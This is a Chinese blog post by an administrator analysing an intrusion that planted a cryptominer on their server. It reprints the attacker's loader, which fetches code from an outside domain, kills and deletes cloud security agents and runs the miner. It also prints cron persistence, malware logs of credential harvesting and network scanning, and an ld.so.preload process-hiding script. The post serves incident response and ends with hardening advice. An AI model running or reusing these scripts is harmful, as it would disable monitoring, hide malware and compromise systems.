记一次服务器被入侵,没想到我轻松搞定了它~
服务器被入侵挖矿过程
事情经过
首要问题是保障业务正常可用,于是快速拉起另外一个实例,将业务迁移过去。接下来, 首先将被入侵服务器关机,然后一步步研究入侵过程,以及其在服务器上的行为。
入侵行为分析
python -c 'import urllib;exec urllib.urlopen("http://m.windowsupdatesupport.org/d/loader.py").read()
import sysimport osfrom os.path import expanduser
ver=sys.version
shs='''ps aux | grep -v grep | grep 'aegis' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'hids' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'titanagent' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'hids' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'titanagent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'sgagent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'barad_agent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'hostguard' | awk '{print $2}' | xargs -I {} kill -9 {}
rm -rf /usr/local/aegis
rm -rf /usr/local/qcloud
rm -rf /usr/local/hostguard/bin
ps aux | grep -v grep | grep 'kworkers' | awk '{print $2}' | xargs -I {} kill -9 {}
'''os.system(shs)
domainroota="m.windowsupdatesupport.org"#domainroota="192.168.67.131"#$domainroota#curl http://$domainroota/d/kworkers -o $gitdir/kworkershomedir=expanduser("~")
gitdir=""try:
os.mkdir(homedir+"/.git")except Exception as e:
print(e)if os.path.isdir(homedir+"/.git"):
gitdir=homedir+"/.git"try:
os.mkdir("./.git")except Exception as e:
print(e)if os.path.isdir("./.git"):
gitdir="./.git"downloadu="http://{}/d/kworkers".format(domainroota)if ver.startswith("3"): import urllib.request with urllib.request.urlopen(downloadu) as f:
html = f.read()
open(gitdir + "/kworkers", 'wb').write(html)else: import urllib2 with open(gitdir + "/kworkers", 'wb') as f:
f.write(urllib2.urlopen("http://{}/d/kworkers".format(domainroota)).read())
f.close()print ("Download Complete!")
os.system("chmod 777 "+gitdir+"/kworkers")if os.path.isfile('/.dockerenv'):
os.system(gitdir+"/kworkers")else:
os.system("nohup {}/kworkers >>{}/.log&".format(gitdir,gitdir))
远程代码主要做了这些事情:
卸载服务器上的安全监控工具;事后开机,发现阿里云盾果然被卸载了 关掉所有kworkers进程; 在当前目录下创建 .git 目录,下载并执行 kworkers 程序。
服务器残留痕迹
# crontab -l
0 2 * * * /xxx/.git/kworkers
/xxx/.git
/xxx/.git
working dir /xxx from pid 23684
version not exist download
Downloaded: http://m.windowsupdatesupport.org/d/download
version not exist dbus
Downloaded: http://m.windowsupdatesupport.org/d/dbus
version not exist hideproc.sh
Downloaded: http://m.windowsupdatesupport.org/d/hideproc.sh
error exit status 1version not exist sshkey.sh
Downloaded: http://m.windowsupdatesupport.org/d/sshkey.sh
version not exist autoupdate
Downloaded: http://m.windowsupdatesupport.org/d/autoupdate
version not exist kworkers
Key path not found
/xxx/.git
passfound protected
passfound provided
passfound +client
passfound +client
passfound protected
passfound provided
passfound quality
passfound (plus
passfound (digits,
passfound prompt
found aksk xxxx xxxx
found aksk xxxx xxxx
passfound xxx
passfound xxx
passfound xxx
passfound xxx
passfound xxx
passfound xxx
lstat /proc/7776/fd/3: no such file or directory
lstat /proc/7776/fdinfo/3: no such file or directory
lstat /proc/7776/task/7776/fd/3: no such file or directory
lstat /proc/7776/task/7776/fdinfo/3: no such file or directory
lstat /proc/7776/task/7777/fd/3: no such file or directory
lstat /proc/7776/task/7777/fdinfo/3: no such file or directory
lstat /proc/7776/task/7778/fd/3: no such file or directory
lstat /proc/7776/task/7778/fdinfo/3: no such file or directory
lstat /proc/7776/task/7779/fd/3: no such file or directory
lstat /proc/7776/task/7779/fdinfo/3: no such file or directory
lstat /proc/7776/task/7780/fd/3: no such file or directory
lstat /proc/7776/task/7780/fdinfo/3: no such file or directory
lstat /proc/7776/task/7781/fd/3: no such file or directory
lstat /proc/7776/task/7781/fdinfo/3: no such file or directory
lstat /proc/7776/task/7782/fd/3: no such file or directory
lstat /proc/7776/task/7782/fdinfo/3: no such file or directory
lstat /proc/7776/task/7783/fd/3: no such file or directory
lstat /proc/7776/task/7783/fdinfo/3: no such file or directory
restart cmd /xxx/.git/kworkers
/xxx/.git
passfound file,
passfound settings
passfound file.
passfound callbacks
passfound Callback
passfound example
passfound prompt
passfound password
passfound information
passfound token
passfound token
passfound token
passfound Password
passfound password
passfound password
passfound -based
passfound Password
passfound (using
passfound field>
passfound retry
passfound foobar
passfound foobar
passfound foobar
passfound foobar
passfound foobar
passfound password
passfound password
passfound foobar
passfound foobar
passfound secretr
total passwords 25
xxx.xxx.xxx.xxx
lan ip
doscan range xxx.xxx.0.0/16
ping...
Receive 24 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 time=496.309µs
working dir /xxx from pid 7792
Receive 24 bytes from xxx.xxx.xxx: icmp_seq=0 time=257.973µs
xxx.xxx.xxx is alive
xxx.xxx.xxx is alive
xxx.xxx.xxx:80 open
xxx.xxx0xxx:443 open
version same download
version same dbus
restart dbus
exec again dbus downrun
kill process pid 23709
process completed
version same hideproc.sh
skip restart hideproc.sh
version same sshkey.sh
skip restart sshkey.sh
version same autoupdate
skip restart autoupdate
version same kworkers
Key path not found
对 hideproc.sh 感兴趣,其内容为:
if [ "$EUID" -ne 0 ] then echo "Please run as root"else
if [ `grep libc2.28 /etc/ld.so.preload` ] then echo "hideproc already done!!"
else
apt-get update -y
apt-get install build-essential -y
yum check-update
yum install build-essential -y
dnf groupinstall "Development Tools" -y
yum group install "Development Tools" -y
curl http://m.windowsupdatesupport.org/d/processhider.c -o processhider.c
gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
mv libc2.28.so /usr/local/lib/ -f
grep libc2.28 /etc/ld.so.preload || echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
rm -f processhider.c
ls >/tmp/.1 2>&1
grep libc2.28.so /tmp/.1 && echo >/etc/ld.so.preload fifi
其他信息
除了上述文件,/tmp文件夹下还生成了.1和.1.sh文件;
查询可疑ip,位于国内北京市,应该是肉鸡;
查询木马下载域名 windowsupdatesupport.org,今年6月注册,解析ip都在国外。该域名很有混淆性,并且为了方便直接用http访问;
除了下载木马文件挖矿,未改变服务器上的其他数据。
服务器被入侵挖矿解决办法
2、使用非 root 用户启动 SpringBoot 应用;
3、被入侵的是子系统,增加基本授权:
apt install -y apache2-utils
htpasswd /etc/nginx/conf.d/.htpasswd user
然后配置 Nginx 使用认证信息:
server {
...
auth_basic "子系统鉴权:";
auth_basic_user_file /etc/nginx/conf.d/.htpasswd;
..
}
4、防火墙限制对外连接。
总结
幸运的是这次来的是挖矿木马,服务器上的程序和数据都未受影响。也很感谢阿里云免费的安全提醒,让我在第一时间处理。
但这次事故也敲醒了警钟:
不要随意用 root 权限运行程序; 防火墙权限要严格收紧; 做好安全监控; 时刻做好数据备份。
推荐阅读:
评论